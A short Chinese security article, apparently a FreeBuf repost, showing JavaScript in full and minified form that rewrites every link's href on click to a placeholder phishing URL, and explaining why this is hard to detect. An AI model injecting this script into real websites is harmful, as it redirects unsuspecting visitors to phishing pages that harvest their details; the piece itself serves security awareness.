JavaScript控制href属性进行钓鱼

安全
前一阵子,发现JavaScript中允许临时改变<a>标签的href属性,当改变其属性后你点击它可能看不出有多严重,但是,它可以通过欺骗手段来诱骗用户透露他们的详细资料。

前一阵子,发现JavaScript中允许临时改变<a>标签的href属性,当改变其属性后你点击它可能看不出有多严重,但是,它可以通过欺骗手段来诱骗用户透露他们的详细资料。

// Uncompressed

var links = document.getElementsByTagName('a');

for(var i=0; i < links.length; i++){

links[i].onclick = function(){

this.href = 'http://freebuf.com/phishing/……'; // 插入链接(你们懂的)

};

}

// Compressed (100 characters exc. the link)

o=document.getElementsByTagName('a');for(j=0;j<o.length;j++){o[j].onclick=function(){this.href='http://freebuf.com/phishing/……';}}

当你点击链接,javascript代码被执行并改变了<a>标签的href属性。令人惊讶的是,浏览器竟然把受害者导航到一个新的链接。而受害者通常会简单的认为,可能只是一个重定向链接,这里我们假设网站的访问者已经习惯了这种重定向现象,这一缺陷便可以进行网络钓鱼。

这种钓鱼很难能被检测到。很多人都使用JavaScript/ jQuery框架组合来绑定<a>标签,每个<a>标签的onclick函数不是那么容易就能解除绑定的。一个技术还不错的黑客可以嵌入恶意的JavaScript或进行代码注入,因为这样很容易更新JavaScript(尤其是可嵌入的)。
 

责任编辑:蓝雨泪 来源: FreebuF
相关推荐

2010-08-23 10:11:22

CSSfloatJavaScript

2015-06-15 11:45:55

2023-12-14 15:34:19

2015-09-24 10:02:34

2013-03-11 18:04:02

2022-03-21 11:58:51

DDoS攻击钓鱼攻击钓鱼网站

2021-08-29 21:58:58

钓鱼攻击微软SharePoint

2009-07-08 17:42:26

this属性

2021-05-08 09:49:07

JavaScript延迟加载

2010-09-03 13:55:25

2023-08-07 15:43:55

2023-08-02 19:51:33

2017-12-07 22:58:14

2021-11-07 12:02:13

钓鱼网站卡巴斯基网络安全

2011-01-20 10:33:30

Postfix

2010-06-02 14:16:18

SVN版本控制

2009-07-08 17:48:18

prototype属性

2012-11-08 10:40:47

JavaScript原型链

2009-07-08 17:51:45

constructor

2010-01-04 17:20:47

ADO属性
点赞
收藏

51CTO技术栈公众号